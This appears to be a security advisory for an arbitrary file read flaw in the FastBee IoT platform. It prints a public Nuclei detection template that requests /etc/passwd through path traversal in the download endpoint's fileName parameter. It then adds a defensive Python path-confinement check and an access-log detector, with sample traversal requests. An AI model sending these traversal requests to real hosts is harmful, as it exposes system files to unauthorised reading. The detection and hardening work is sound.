fastbee-arbitrary-file-read: FastBee - Local File Inclusion

Date: 2025-08-01 | Affected software: FastBee | PoC: public

Vulnerability description

An arbitrary file read vulnerability exists in the download endpoint of the FastBee IoT platform: the fileName parameter is used to build a file path without confining it to the intended download directory, so a request can traverse out of it and read arbitrary files on the host. This may lead to sensitive information leakage, data theft and other security risks, causing serious harm to the system and its users.

PoC code [public]

id: fastbee-arbitrary-file-read

info:
  name: FastBee - Local File Inclusion
  author: s4e-io
  severity: high
  description: |
    Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
  reference:
    - https://blog.csdn.net/weixin_43167326/article/details/141806542
  metadata:
    verified: true
    max-request: 1
    vendor: fastbee
    product: fastbee
    fofa-query: "fastbee"
  tags: fastbee,iot,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>FastBee")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: word
        part: content_type
        words:
          - 'application/octet-stream'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c7e8dff98cb9473148a78491c989c0fe2bbd6d01bfc6e58ff8d10603b22c25b7022100bb117dbc5ecca252f5fca7d7d2d8444d5246472b157b3519bb3d2331aa311b4a:922c64590222798bb761d5b6d8e72950
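The template above detects the flaw from the outside by requesting /etc/passwd through the fileName parameter. The following is an added, defender-side example that is not part of the Nuclei template or of the FastBee project: it shows the canonicalisation check a download handler needs so that a fileName such as /../../../../etc/passwd cannot escape the download directory, and a small detector that applies the same rule to web-server access logs to flag attempts against the /prod-api/iot/tool/download endpoint. The download root (/opt/fastbee/uploads), the IP addresses and the log lines are constructed for the example and are not taken from the advisory.

```python
"""
Added example (not FastBee project code and not part of the Nuclei template).

  1. resolve_download_path(): the path-confinement check a file download
     handler needs so that a traversing fileName never resolves outside
     the configured download directory.
  2. scan_access_log(): flags requests to the FastBee download endpoint
     whose fileName would fail that same check, run over constructed
     sample access-log lines.

DOWNLOAD_ROOT, the IP addresses and SAMPLE_LOG are constructed values.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

DOWNLOAD_ROOT = "/opt/fastbee/uploads"          # hypothetical download directory
DOWNLOAD_ENDPOINT = "/prod-api/iot/tool/download"  # endpoint named in the template


def resolve_download_path(base_dir: str, file_name: str):
    """Return the absolute path to serve, or None if file_name would resolve
    outside base_dir.

    The value is URL-decoded once more (parse_qs already decoded once, so this
    also covers double-encoded input), leading separators are stripped so an
    absolute fileName cannot replace the base directory, and the joined path is
    normalised. Only a result that still lies strictly below base_dir is served.
    """
    base = posixpath.normpath(base_dir)
    relative = unquote(file_name).lstrip("/\\")
    candidate = posixpath.normpath(posixpath.join(base, relative))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


def is_traversal_attempt(request_target: str) -> bool:
    """True if the request hits the download endpoint with a fileName that the
    hardened handler would refuse."""
    parts = urlsplit(request_target)
    if parts.path != DOWNLOAD_ENDPOINT:
        return False
    for name in parse_qs(parts.query).get("fileName", []):
        if resolve_download_path(DOWNLOAD_ROOT, name) is None:
            return True
    return False


# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:15:02 +0000] "GET / HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2025:10:15:03 +0000] "GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.8 - - [01/Aug/2025:10:16:41 +0000] "GET /prod-api/iot/tool/download?fileName=report-2025-07.csv HTTP/1.1" 200 8731
10.0.0.9 - - [01/Aug/2025:10:17:10 +0000] "GET /prod-api/iot/tool/download?fileName=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
"""


def scan_access_log(text: str):
    """Return (source, timestamp, status, request_target) for each flagged
    request. A 200 status on a flagged line indicates the file was most
    likely served and the host should be treated as exposed."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m["target"]):
            hits.append((m["src"], m["ts"], int(m["status"]), m["target"]))
    return hits


if __name__ == "__main__":
    for src, ts, status, target in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {src} status={status} {target}")
```

The handler check and the log detector deliberately share one function: whatever the server would refuse is exactly what the detector reports, so there is no second list of "bad patterns" to keep in sync. Note that the sample's benign request (report-2025-07.csv) is not flagged, while both the plain and the URL-encoded traversal are, because the decision is made on the normalised path rather than on the presence of a literal "../".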
